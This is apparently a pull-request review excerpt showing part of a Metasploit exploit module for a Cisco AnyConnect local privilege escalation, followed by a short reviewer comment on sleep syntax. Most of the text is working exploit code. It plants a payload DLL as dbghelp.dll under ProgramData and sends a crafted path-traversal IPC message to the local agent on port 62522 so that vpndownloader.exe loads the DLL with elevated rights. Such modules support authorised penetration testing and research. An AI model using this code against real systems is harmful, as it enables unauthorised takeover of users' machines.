modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb

```diff
@@ -0,0 +1,213 @@
+        if @ac_version < patched_version
+          vprint_good("Cisco AnyConnect version #{@ac_version} appears to be vulnerable")
+          return CheckCode::Appears
+        else
+          vprint_error("Cisco AnyConnect version #{@ac_version} is not vulnerable")
+          return CheckCode::Safe
+        end
+      else
+        vprint_warning('Unable to retrieve vpndownloader.exe file version')
+      end
+    else
+      vprint_warning('vpndownloader.exe not found on the file system')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    fail_with(Failure::None, 'Session is already elevated') if is_system?
+
+    if check == CheckCode::Safe
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    cac_cmd = '"CAC-nc-install'
+    if @ac_version && @ac_version >= Gem::Version.new('4.7')
+      vprint_status('"-ipc" argument needed')
+      cac_cmd << "\t-ipc=#{rand_text_numeric(4)}"
+    else
+      vprint_status('"-ipc" argument not needed')
+    end
+
+    dbghelp_path = 'C:\\ProgramData\\Cisco\\dbghelp.dll'
+    print_status("Writing the payload to #{dbghelp_path}")
+
+    begin
+      payload_dll = generate_payload_dll(dll_exitprocess: true)
+      write_file(dbghelp_path, payload_dll)
+      register_file_for_cleanup(dbghelp_path)
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::NotFound, e.message)
+    end
+
+    # vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
+    # normal process will copy the file to
+    # "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
+    register_file_for_cleanup("C:\\ProgramData\\Cisco\\vpndownloader.exe")
+    cac_cmd << "\t#{@installation_path}\\nope\\nope\\nope\\nope\\../../../../vpndownloader.exe\t-\""
+    vprint_status("RPC Command: #{cac_cmd}")
+
+    cipc_msg = CIPCMessage.new
+    cipc_msg.body << CIPCTlv.new(
+      msg_type: 0,
+      msg_index: 2,
+      msg_value: cac_cmd
+    )
+    cipc_msg.body << CIPCTlv.new(
+      msg_type: 0,
+      msg_index: 6,
+      msg_value: "#{@installation_path}\\vpndownloader.exe"
+    )
+
+    vprint_status('Connecting to the AnyConnect agent on 127.0.0.1:62522')
+    begin
+      socket = client.net.socket.create(
+        Rex::Socket::Parameters.new(
+          'PeerHost' => '127.0.0.1',
+          'PeerPort' => 62522,
+          'Proto'    => 'tcp'
+        )
+      )
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    vprint_status("Send the encoded RPC command (size = #{cipc_msg.num_bytes} bytes)")
+    socket.write(cipc_msg.to_binary_s)
+    socket.flush
+    # Give FileDropper some time to cleanup before handing over to the operator
+    Rex::sleep(3)
```

Comment:
I think `.` is preferred (maybe):

```suggestion
    Rex.sleep(3)
```

Reply:
I'll change this too.